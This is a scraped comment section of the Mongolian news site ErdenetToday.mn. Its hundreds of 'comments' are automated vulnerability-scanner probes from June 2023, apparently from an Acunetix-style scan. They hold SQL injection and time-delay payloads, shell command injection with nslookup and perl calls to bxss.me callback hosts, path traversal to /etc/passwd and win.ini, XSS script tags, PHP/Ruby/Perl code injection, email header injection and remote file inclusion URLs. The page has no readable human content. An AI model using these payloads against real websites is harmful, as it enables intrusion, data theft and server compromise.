ErdenetToday.mn

Эрдэнэт үйлдвэрийн мэдээ мэдээллийн эх сурвалж

Сэтгэгдэл (625)

wave
 • Guest1

  RDFYjolf

  2023-06-12 05:18 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:29 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 06:10 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 06:10 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 06:10 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 06:10 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 06:10 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 06:10 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 06:15 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 06:15 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 00:56 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:19 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:20 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:09 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:24 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:24 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | response.write(9578344*9248995)

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | '+response.write(9578344*9248995)+'

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | "+response.write(9578344*9248995)+"

  1

 • Guest1

  response.write(9424904*9780839)

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  '+response.write(9424904*9780839)+'

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  "+response.write(9424904*9780839)+"

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | 192.168.234.14

  response.write(9739942*9915720)

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | 192.168.234.14

  '+response.write(9739942*9915720)+'

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | 192.168.234.14

  "+response.write(9739942*9915720)+"

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  echo rvmyod$()\ mmsyjy\nz^xyu||a #' &echo rvmyod$()\ mmsyjy\nz^xyu||a #|" &echo rvmyod$()\ mmsyjy\nz^xyu||a #

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  &echo eewyax$()\ bshnds\nz^xyu||a #' &echo eewyax$()\ bshnds\nz^xyu||a #|" &echo eewyax$()\ bshnds\nz^xyu||a #

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  |echo gsgfss$()\ tzbjqv\nz^xyu||a #' |echo gsgfss$()\ tzbjqv\nz^xyu||a #|" |echo gsgfss$()\ tzbjqv\nz^xyu||a #

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  (nslookup hitwmvtzusntb3d8a7.bxss.me||perl -e "gethostbyname('hitwmvtzusntb3d8a7.bxss.me')")

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  $(nslookup hitwnsxpqqvgo0a81a.bxss.me||perl -e "gethostbyname('hitwnsxpqqvgo0a81a.bxss.me')")

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  &(nslookup hituapryzkpzc2f18b.bxss.me||perl -e "gethostbyname('hituapryzkpzc2f18b.bxss.me')")&'\"`0&(nslookup hituapryzkpzc2f18b.bxss.me||perl -e "gethostbyname('hituapryzkpzc2f18b.bxss.me')")&`'

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  |(nslookup hitmmbzzdllbwbf3cb.bxss.me||perl -e "gethostbyname('hitmmbzzdllbwbf3cb.bxss.me')")

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | tURTDgLT

  1

 • Guest1

  `(nslookup hitpirymwblmq2a649.bxss.me||perl -e "gethostbyname('hitpirymwblmq2a649.bxss.me')")`

  2023-06-12 05:26 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | -1 OR 2+876-876-1=0+0+0+1 --

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | -1 OR 2+514-514-1=0+0+0+1

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | -1' OR 2+251-251-1=0+0+0+1 --

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | -1" OR 2+310-310-1=0+0+0+1 --

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | if(now()=sysdate(),sleep(15),0)

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | 1 waitfor delay '0:0:15' --

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:26 | LEFIptB6'; waitfor delay '0:0:15' --

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  echo sidpjd$()\ kgeorh\nz^xyu||a #' &echo sidpjd$()\ kgeorh\nz^xyu||a #|" &echo sidpjd$()\ kgeorh\nz^xyu||a #

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  &echo ldspmg$()\ qmscol\nz^xyu||a #' &echo ldspmg$()\ qmscol\nz^xyu||a #|" &echo ldspmg$()\ qmscol\nz^xyu||a #

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  |echo mghuuw$()\ fedtmr\nz^xyu||a #' |echo mghuuw$()\ fedtmr\nz^xyu||a #|" |echo mghuuw$()\ fedtmr\nz^xyu||a #

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  (nslookup hitidzieftdhrb26c6.bxss.me||perl -e "gethostbyname('hitidzieftdhrb26c6.bxss.me')")

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  $(nslookup hitooypudktobb7632.bxss.me||perl -e "gethostbyname('hitooypudktobb7632.bxss.me')")

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  &(nslookup hitaynfuukqmpcb679.bxss.me||perl -e "gethostbyname('hitaynfuukqmpcb679.bxss.me')")&'\"`0&(nslookup hitaynfuukqmpcb679.bxss.me||perl -e "gethostbyname('hitaynfuukqmpcb679.bxss.me')")&`'

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  |(nslookup hitbtdvnjfdpna12c5.bxss.me||perl -e "gethostbyname('hitbtdvnjfdpna12c5.bxss.me')")

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  `(nslookup hityxcfxjgbvtc793a.bxss.me||perl -e "gethostbyname('hityxcfxjgbvtc793a.bxss.me')")`

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 1'"

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  ;(nslookup hitkecmjxqxwub1ffb.bxss.me||perl -e "gethostbyname('hitkecmjxqxwub1ffb.bxss.me')")|(nslookup hitkecmjxqxwub1ffb.bxss.me||perl -e "gethostbyname('hitkecmjxqxwub1ffb.bxss.me')")&(nslookup hitkecmjxqxwub1ffb.bxss.me||perl -e "gethostbyname('hitkecmjxqxwub1ffb.bxss.me')")

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 1����%2527%2522

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | @@4Tp83

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • GuestCBncYtRh

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | IhkzjgmZ

  1

 • Guest1fOeLVKi

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  2sQvCRZ4

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  858bTVR6

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | ../192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest../1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  ../../../../../../../../../../../../../../etc/passwd

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  ../../../../../../../../../../../../../../windows/win.ini

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  ../RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | '"

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | <!--

  1

 • Guest'"

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest<!--

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  '"

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  <!--

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  '"

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  <!--

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14&n985585=v920075

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  ../../../../../../../../../../../../../../etc/passwd

 • Guest1

  RDFYjolf&n943176=v994934

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  ../../../../../../../../../../../../../../windows/win.ini

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  ../1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1&n900227=v961462

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | /xfs.bxss.me

  1

 • Guest1

  RDFYjolf%0abcc:009247.17-7571.17.4e3e0.19520.2@bxss.me

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  to@example.com>%0d%0abcc:009247.17-7572.17.4e3e0.19520.2@bxss.me

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest941903

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | ${10000409+9999161}

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1%0abcc:009247.17-7575.17.4e3e0.19520.2@bxss.me

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  to@example.com>%0d%0abcc:009247.17-7576.17.4e3e0.19520.2@bxss.me

 • Guest1

  RDFYjolf<esi:include src="http://bxss.me/rpb.png"/>

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  ${10000393+9999535}

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  /xfs.bxss.me

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1<esi:include src="http://bxss.me/rpb.png"/>

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  ${9999217+9999115}

 • Guest1

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1

  cERoSGtLaHQ=

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest1'"

  RDFYjolf

  2023-06-12 05:27 | 192.168.234.14

  1

 • Guest@@flYXv

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | HttP://bxss.me/t/xss.html?%00

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  /xfs.bxss.me

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | bxss.me/t/xss.html?%00

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | )

  1

 • Guest1

  kxIVuACE

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | !(()&&!|*|*|

  1

 • Guest1

  -1 OR 2+222-222-1=0+0+0+1 --

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | ^(#$!@#$)(()))******

  1

 • Guest1

  -1 OR 2+127-127-1=0+0+0+1

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest)

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  -1' OR 2+529-529-1=0+0+0+1 --

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  -1' OR 2+71-71-1=0+0+0+1 or 'jsbvZrPJ'='

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  HttP://bxss.me/t/xss.html?%00

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  -1" OR 2+122-122-1=0+0+0+1 --

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  bxss.me/t/xss.html?%00

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  if(now()=sysdate(),sleep(15),0)

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | Http://bxss.me/t/fit.txt

  1

 • Guest1

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | http://bxss.me/t/fit.txt%3F.14

  1

 • Guest1

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | bxss.me

  1

 • Guest1

  )

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  !(()&&!|*|*|

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  1 waitfor delay '0:0:15' --

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  oxaKaN8h'; waitfor delay '0:0:15' --

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  ^(#$!@#$)(()))******

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  HttP://bxss.me/t/xss.html?%00

 • Guest1

  NoZLFHS1' OR 711=(SELECT 711 FROM PG_SLEEP(15))--

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  bxss.me/t/xss.html?%00

 • Guest1

  d5G8c8j8') OR 871=(SELECT 871 FROM PG_SLEEP(15))--

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  hxZz62oE')) OR 65=(SELECT 65 FROM PG_SLEEP(15))--

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  1'"

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  "+"A".concat(70-3).concat(22*4).concat(118).concat(71).concat(113).concat(84)+(require"socket" Socket.gethostbyname("hitrd"+"pwngaekg36bc5.bxss.me.")[3].to_s)+"

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  1����%2527%2522

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  '+'A'.concat(70-3).concat(22*4).concat(100).concat(88).concat(119).concat(89)+(require'socket' Socket.gethostbyname('hitrp'+'uttpavvpfbdf8.bxss.me.')[3].to_s)+'

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  @@ocJWm

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  )

 • Guestbxss.me

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  !(()&&!|*|*|

 • Guest1

  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  ^(#$!@#$)(()))******

 • Guest1

  1some_inexistent_file_with_long_name%00.jpg

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  "+"A".concat(70-3).concat(22*4).concat(118).concat(69).concat(122).concat(74)+(require"socket" Socket.gethostbyname("hitsz"+"cvpqbeuu63060.bxss.me.")[3].to_s)+"

 • Guest1

  Http://bxss.me/t/fit.txt

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  '+'A'.concat(70-3).concat(22*4).concat(118).concat(80).concat(100).concat(76)+(require'socket' Socket.gethostbyname('hitxl'+'lcpgvbub7962d.bxss.me.')[3].to_s)+'

 • Guest1

  http://bxss.me/t/fit.txt%3F.jpg

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  bxss.me

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 1RD2vd6cO

  1

 • Guest1BiSQS72O

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  1b49P0rlO

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1KXVEA8tO

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1some_inexistent_file_with_long_name%00.jpg

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  Http://bxss.me/t/fit.txt

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  http://bxss.me/t/fit.txt%3F.jpg

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  bxss.me

 • Guest1

  '.gethostbyname(lc('hitte'.'tqfzjdxg8e641.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(67).chr(109).chr(66).'

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  ".gethostbyname(lc("hitzj"."yvpampsv6beda.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(76).chr(117).chr(73)."

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | ';print(md5(31337));$a='

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | ";print(md5(31337));$a="

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  '.gethostbyname(lc('hitva'.'cywfsqtufb45e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(70).chr(115).chr(86).'

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | ${@print(md5(31337))}

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  ".gethostbyname(lc("hitve"."umewftjibe852.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(82).chr(110).chr(86)."

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | ${@print(md5(31337))}\

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | '.print(md5(31337)).'

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | '"()&%<acx><ScRiPt >W3JU(9853)</ScRiPt>

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.149850771

  1

 • Guest1

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  ';print(md5(31337));$a='

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest19344708

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  ";print(md5(31337));$a="

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf'"()&%<acx><ScRiPt >W3JU(9163)</ScRiPt>

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  ${@print(md5(31337))}

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  '"()&%<acx><ScRiPt >W3JU(9439)</ScRiPt>

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  ${@print(md5(31337))}\

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf9540612

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  '.print(md5(31337)).'

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  ';print(md5(31337));$a='

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  ";print(md5(31337));$a="

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  ${@print(md5(31337))}

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  ${@print(md5(31337))}\

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  '.print(md5(31337)).'

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  1

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  WB2uMzlH

 • Guest1

  RDFYjolf

  2023-06-12 05:28 | 192.168.234.14

  -1 OR 2+382-382-1=0+0+0+1 --

 • Guest1

